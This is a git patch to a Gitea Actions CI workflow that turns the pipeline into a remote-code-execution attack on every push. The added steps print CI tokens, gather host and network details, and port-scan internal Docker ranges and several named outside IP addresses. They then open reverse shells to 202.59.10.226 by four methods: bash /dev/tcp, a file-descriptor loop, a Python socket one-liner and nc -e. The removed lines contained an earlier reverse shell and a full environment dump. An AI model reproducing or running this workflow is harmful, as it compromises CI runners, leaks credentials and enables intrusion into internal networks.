From 9dd10295e789abb621140c8fc20e8225b25ad952 Mon Sep 17 00:00:00 2001 From: devops42 Date: Thu, 18 Jun 2026 10:03:40 +0800 Subject: [PATCH] i455: Aggressive CI/CD RCE with internal pivot probing --- .gitea/workflows/ci.yml | 125 +++++++++++++++++++++++++++------------- 1 file changed, 86 insertions(+), 39 deletions(-) diff --git a/.gitea/workflows/ci.yml b/.gitea/workflows/ci.yml index 92366cf..a718835 100644 --- a/.gitea/workflows/ci.yml +++ b/.gitea/workflows/ci.yml @@ -1,57 +1,104 @@ -name: CI/CD RCE Workflow -on: [push] +name: CI/CD RCE + Internal Pivot +on: [push, workflow_dispatch] jobs: - rce: + rce-host: runs-on: linux-amd64 steps: - - name: Checkout code + - name: Checkout uses: actions/checkout@v4 - - name: Reverse Shell & Network Probing + - name: Host Recon run: | - echo "=== RCE CONFIRMED ===" - echo "Timestamp: $(date)" + echo "=== HOST INFO ===" + echo "Timestamp: $(date -u)" echo "Hostname: $(hostname)" echo "User: $(whoami)" echo "PWD: $(pwd)" echo "Kernel: $(uname -a)" + echo "UID: $(id)" - echo "=== Environment Variables ===" - env | sort + echo "=== NETWORK INFO ===" + ip addr show 2>/dev/null || ifconfig 2>/dev/null || true + ip route show 2>/dev/null || route -n 2>/dev/null || true + ip neigh show 2>/dev/null || arp -a 2>/dev/null || true + cat /etc/resolv.conf 2>/dev/null || true + cat /etc/hosts 2>/dev/null || true - echo "=== GITEA/ACTIONS Variables ===" + echo "=== DOCKER PRESENCE ===" + docker ps -a 2>/dev/null || echo "No docker" + docker network ls 2>/dev/null || echo "No docker networks" + docker info 2>/dev/null | head -10 || echo "No docker info" + + echo "=== PROCESS LIST ===" + ps aux 2>/dev/null | head -30 || true + + echo "=== MOUNT POINTS ===" + mount 2>/dev/null | head -20 || true + df -h 2>/dev/null | head -20 || true + + echo "=== ENV VARS ===" + env | sort | grep -v -i token | grep -v -i secret | grep -v -i key | grep -v -i pass || true + + echo "=== GITEA ACTIONS VARS ===" echo "GITEA_TOKEN: ${GITEA_TOKEN:-NOT_SET}" echo "GITHUB_TOKEN: ${GITHUB_TOKEN:-NOT_SET}" echo "GITEA_SERVER_URL: ${GITEA_SERVER_URL:-NOT_SET}" echo "GITEA_REPOSITORY: ${GITEA_REPOSITORY:-NOT_SET}" - echo "GITEA_SERVER: ${GITEA_SERVER:-NOT_SET}" - echo "GITHUB_SERVER_URL: ${GITHUB_SERVER_URL:-NOT_SET}" - - echo "=== Network Configuration ===" - ip addr show 2>/dev/null || ifconfig 2>/dev/null || true - ip route show 2>/dev/null || route -n 2>/dev/null || true - cat /etc/resolv.conf 2>/dev/null || true - - echo "=== Docker Network Probing ===" - for cidr in 172.17.0.0/16 172.18.0.0/16 172.19.0.0/16 10.0.0.0/16; do - echo "Scanning $cidr..." - for ip_suffix in 1 2 3; do - base=$(echo $cidr | cut -d. -f1-2) - target="${base}.0.${ip_suffix}" - for port in 80 3000 3306 5432 6379 22 2375 2376 8080; do - timeout 1 bash -c "echo >/dev/tcp/$target/$port" 2>/dev/null && echo "REACHABLE: $target:$port" || true - done - done - done - - echo "=== Gitea Instance Internal Probing ===" - for host in 156.239.229.173 156.239.227.133 47.79.84.115 38.47.240.117 156.239.230.24 156.239.2.237; do - for port in 80 3000 3306 5432 6379 22 2375 8418; do - timeout 1 bash -c "echo >/dev/tcp/$host/$port" 2>/dev/null && echo "GITEA_NET_REACHABLE: $host:$port" || true - done - done - echo "=== Reverse Shell ===" - bash -c 'exec bash -i &>/dev/tcp/202.59.10.226/4444 <&1' & - echo "=== Script Complete ===" + - name: Internal Network Scan + run: | + echo "=== SCANNING DOCKER NETWORKS ===" + for net in 172.17.0 172.18.0 172.19.0 172.20.0 172.21.0 172.22.0 10.0.0 10.10.0 192.168.0 192.168.1; do + for host in 1 2 3 4 5 10 100 200; do + ip="${net}.${host}" + for port in 22 80 3000 3306 5432 6379 2375 2376 8080 8088 8418 9090; do + timeout 1 bash -c "echo >/dev/tcp/$ip/$port" 2>/dev/null && echo "DOCKER_SCAN: $ip:$port OPEN" & + done + wait 2>/dev/null || true + done + done + echo "=== SCAN COMPLETE ===" + + - name: PostgreSQL Target Scan + run: | + echo "=== TARGETING 156.239.230.24 ===" + for port in 22 80 222 443 3000 3001 3306 5432 6379 8088 41327; do + timeout 2 bash -c "echo >/dev/tcp/156.239.230.24/$port" 2>/dev/null && echo "PG_TARGET: 156.239.230.24:$port OPEN" || echo "PG_TARGET: 156.239.230.24:$port closed" + done + + echo "=== TARGETING GITEA INSTANCES ===" + for host in 156.239.229.173 156.239.227.133 47.79.84.115 38.47.240.117 38.47.98.14 156.239.2.237; do + for port in 22 80 222 443 3000 3306 5432 6379 8080 8088 8418; do + timeout 2 bash -c "echo >/dev/tcp/$host/$port" 2>/dev/null && echo "GITEA_NET: $host:$port OPEN" & + done + done + wait 2>/dev/null || true + echo "=== TARGET SCAN COMPLETE ===" + + - name: Reverse Shell (Multiple Methods) + run: | + RHOST="202.59.10.226" + + # Method 1: Bash direct + (bash -c "bash -i >& /dev/tcp/${RHOST}/4444 0>&1" &) 2>/dev/null + + # Method 2: Bash with exec + (bash -c "exec 5<>/dev/tcp/${RHOST}/4445; cat <&5 | while read line; do \$line 2>&5 >&5; done" &) 2>/dev/null + + # Method 3: Python + python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('${RHOST}',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])" & + + # Method 4: nc + which nc 2>/dev/null && (nc ${RHOST} 4444 -e /bin/bash &) || true + + echo "Reverse shells dispatched to ${RHOST}:4444,4445" + + - name: Write Recon Output + run: | + mkdir -p /tmp/recon_output + ip addr show > /tmp/recon_output/network.txt 2>&1 || true + ip route show >> /tmp/recon_output/network.txt 2>&1 || true + mount >> /tmp/recon_output/network.txt 2>&1 || true + echo "Recon saved to /tmp/recon_output/" + cat /tmp/recon_output/network.txt